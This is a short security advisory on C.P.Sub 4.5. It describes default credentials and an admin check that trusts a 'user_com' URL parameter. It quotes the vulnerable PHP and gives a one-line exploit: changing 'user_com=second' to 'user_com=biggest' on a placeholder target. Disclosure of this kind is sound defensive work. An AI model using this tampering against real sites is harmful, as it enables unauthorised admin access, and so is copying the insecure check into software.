C.P.Sub Multiple Default Credentials Vulnerability
Summary
Credit:
The information has been provided by Chako.
Details
Vulnerable Systems:
* C.P.Sub 4.5
By default, C.P.Sub installs with multiple unspecified default user credentials (username/password combination). These accounts allow remote attackers to trivially access the program or system and gain privileged access.
Improper Authentication:
Description:
C.P.Sub <= v4.5 use ‘user_com=’ parameter to identify if the user has admin privilege.
Therefore an attacker could simply change the value for ‘user_com=’ parameter to gain admin privilege.
/check.php (LINE: 36-44)
if($_GET[user_com] != ”)
{
$user_com = $_GET[user_com];
}elseif($_POST[user_com] != ”)
{
$user_com = $_POST[user_com];
}
if($user_com == ‘biggest’)
{
Exploit:
change
http://Example_Target/info.php?cookie=yes&user_com=second
to
http://Example_Target/info.php?cookie=yes&user_com=biggest
Disclosure Timeline:
Disclosure Date :2013-07-01